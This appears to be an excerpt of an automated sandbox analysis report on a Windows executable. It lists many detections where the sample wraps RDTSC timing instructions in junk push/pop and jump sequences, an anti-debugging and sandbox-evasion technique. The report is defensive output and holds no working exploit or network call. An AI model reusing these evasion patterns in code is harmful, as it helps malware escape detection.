                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D9022 second address: 10D9026 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D9026 second address: 10D902C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D945D second address: 10D9468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D9468 second address: 10D946E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D946E second address: 10D9472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D9472 second address: 10D9493 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 js 00007F664452DAD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push edx 0x0000000e pop edx 0x0000000f jng 00007F664452DAD6h 0x00000015 pop esi 0x00000016 popad 0x00000017 js 00007F664452DAF6h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D9493 second address: 10D949F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D964F second address: 10D965B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E435A second address: 10E4360 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E4360 second address: 10E4364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E450A second address: 10E4517 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6644F246E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E496B second address: 10E496F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E496F second address: 10E498E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F6644F246F4h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E4ADC second address: 10E4AFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DAE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F664452DAD6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E4AFF second address: 10E4B03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E4B03 second address: 10E4B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E4B09 second address: 10E4B0E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E4DBF second address: 10E4DC5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E4DC5 second address: 10E4DD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F6644F246ECh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E5003 second address: 10E5008 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E515F second address: 10E5167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E5167 second address: 10E51BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DAE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F664452DADEh 0x0000000f pushad 0x00000010 popad 0x00000011 jo 00007F664452DAD6h 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a jmp 00007F664452DAE8h 0x0000001f jmp 00007F664452DAE1h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E51BB second address: 10E51CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F6644F246E6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E609C second address: 10E60A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E60A2 second address: 10E60A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E60A8 second address: 10E60AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E60AC second address: 10E60C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F6644F246E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10EA32E second address: 10EA332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10EEFEF second address: 10EEFF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10EEFF3 second address: 10EF017 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F664452DAEEh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10EF017 second address: 10EF01D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10EF01D second address: 10EF021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10EF021 second address: 10EF04D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F8h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F6644F246E6h 0x00000013 jp 00007F6644F246E6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10EF04D second address: 10EF051 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10EEBA7 second address: 10EEBC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F6644F246F3h 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10F14D8 second address: 10F14DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10F6A83 second address: 10F6A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10FF3EC second address: 10FF41C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F664452DAD6h 0x00000008 jmp 00007F664452DAE3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 jmp 00007F664452DADFh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 102DD5D second address: 102DD61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 111B4E0 second address: 111B4F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F664452DAD6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 111B4F1 second address: 111B4F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 111B4F5 second address: 111B4FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 111B7E3 second address: 111B7E8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 111B7E8 second address: 111B7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jng 00007F664452DAD6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 111B957 second address: 111B95B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 111BAEA second address: 111BB14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F664452DAE1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F664452DAE0h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1120139 second address: 112014C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6644F246EDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 112014C second address: 1120158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F664452DAD6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1120158 second address: 112015C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 112BC01 second address: 112BC05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 112BC05 second address: 112BC17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6644F246ECh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 113EA05 second address: 113EA09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 113EA09 second address: 113EA18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 113EA18 second address: 113EA1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 113EA1C second address: 113EA28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F6644F246E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 113E857 second address: 113E86A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DADCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 113E86A second address: 113E879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F6644F246E6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1141632 second address: 1141638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1141638 second address: 1141647 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6644F246E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1155132 second address: 1155137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1155414 second address: 115542E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6644F246EBh 0x0000000e jp 00007F6644F246E6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 115542E second address: 1155432 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1155432 second address: 1155442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007F6644F246EEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 11558A9 second address: 11558B3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F664452DAD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1155A22 second address: 1155A54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007F6644F246F1h 0x0000000f pop edi 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1155B6B second address: 1155B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F664452DAD6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1155CEE second address: 1155CF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1155CF2 second address: 1155D06 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F664452DAD6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007F664452DADEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1155E69 second address: 1155E6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 115774C second address: 1157754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1157754 second address: 115775B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 115A10B second address: 115A10F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 115A374 second address: 115A37D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 115A37D second address: 115A389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 115A389 second address: 115A390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 115A390 second address: 115A3AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F664452DAE8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 115D6D6 second address: 115D6DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 115F252 second address: 115F25E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnp 00007F664452DAD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 115F25E second address: 115F263 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 115F263 second address: 115F269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1074797 second address: 107479B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57502B0 second address: 57502B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57502B6 second address: 57502BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57502BB second address: 57502C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57502C1 second address: 57502E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6644F246F9h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57502E5 second address: 57502F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F664452DADCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57502F5 second address: 575030A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 575030A second address: 5750333 instructions: 0x00000000 rdtsc 0x00000002 mov ax, 1287h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, esi 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F664452DAE6h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5750333 second address: 575033A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 575033A second address: 5750340 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5750340 second address: 5750375 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, dword ptr [ebp+0Ch] 0x0000000e pushad 0x0000000f mov edx, ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 call 00007F6644F246F8h 0x00000018 pop eax 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5750375 second address: 575038F instructions: 0x00000000 rdtsc 0x00000002 call 00007F664452DADBh 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 575038F second address: 5750393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5750393 second address: 5750399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5750399 second address: 57503B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6644F246F6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57503D3 second address: 57503E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 mov bl, ch 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57503E5 second address: 57503F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
